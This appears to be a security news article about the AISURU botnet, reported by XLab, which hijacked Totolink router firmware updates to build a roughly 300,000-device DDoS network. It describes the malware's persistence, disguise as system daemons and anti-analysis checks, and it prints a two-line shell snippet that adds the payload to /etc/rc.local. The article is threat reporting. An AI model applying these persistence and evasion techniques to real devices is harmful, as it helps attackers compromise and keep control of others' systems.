AISURU Botnet With 300,000 Hijacked Routers Behind The Recent Massive 11.5 Tbps DDoS Attack

Since early 2025, the cybersecurity community has witnessed an unprecedented surge in distributed denial-of-service (DDoS) bandwidth, culminating in a record-shattering 11.5 Tbps assault attributed to a botnet named AISURU.

Emerging from XLab’s continuous monitoring of global DDoS incidents, this botnet leveraged compromised router firmware to amass approximately 300,000 active devices worldwide.

Researchers first detected unusual spikes of malicious traffic targeting major infrastructure providers, prompting deeper investigation into the underlying threat.

XLab analysts noted striking similarities between AISURU’s attack methodology and earlier campaigns, yet the scale and sophistication of this operation far surpassed previous benchmarks.

Propagation of AISURU began in April 2025 when threat actors exploited a vulnerability in Totolink router firmware update servers.

By altering the firmware URL to point to a malicious script, every device performing an automatic update became infected.

In a matter of weeks, the size of AISURU’s network swelled to over 100,000 routers, and by September 2025, the botnet had consolidated around 300,000 nodes.

XLab researchers identified the use of GRE tunneling to distribute traffic loads across multiple command-and-control (C2) servers, enabling the botnet to orchestrate a simultaneous flood of packets that overwhelmed target networks with ease.

The impact of the 11.5 Tbps attack was felt globally as service providers scrambled to mitigate the flood of SYN, UDP, and DNS amplification requests.

Affected organizations reported intermittent outages and service degradation, highlighting the potency of combining large-scale IoT compromise with advanced evasion techniques.

XLab analysts identified the rapid shift from traditional amplification vectors to custom-crafted packet sequences designed to bypass legacy mitigation tools, an innovation that allowed AISURU to set new world records in DDoS throughput.

While AISURU’s distributed architecture and bandwidth capacity are staggering on their own, the malware’s underlying behavior reveals a deeper level of technical refinement.

Its dual-version propagation engine demonstrates continuous evolution, integrating both zero-day exploits and known N-day vulnerabilities to expand its reach.

Equally concerning is its modular design, which facilitates swift updates to encryption, communication protocols, and attack commands without requiring a complete overhaul of the malware codebase.

Infection Mechanism: Firmware Update Hijacking

Delving into AISURU’s infection mechanism uncovers a deceptively simple yet devastating approach.

In April 2025, attackers breached Totolink’s firmware update server, planting a shell script named t.sh that redirected devices to download the AISURU payload.

Once executed, the script set up persistent execution by modifying /etc/rc.local entries and disabling the Linux OOM Killer via /proc/self/oom_score_adj, ensuring the bot remained resident across reboots.

The payload binary, renamed to libcow.so, avoided detection by masquerading as a common system daemon such as telnetd or dhclient.

Upon initialization, AISURU performs environment checks to terminate itself under virtualized or analysis environments by scanning for virtualization artifacts and debugging tools.

It then establishes a secure channel with C2 servers via a custom AES-XOR hybrid protocol, exchanging commands that range from DDoS instructions to residential proxy assignments.

One illustrative snippet of the persistence routine follows:-

# Persistence setup in /etc/rc.local
echo "/usr/lib/libcow.so &" >> /etc/rc.local
chmod +x /usr/lib/libcow.so

This mechanism underscores the threat actors’ mastery over both traditional Linux administration and bespoke malware engineering, enabling AISURU to maintain dominance in the DDoS ecosystem.

Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free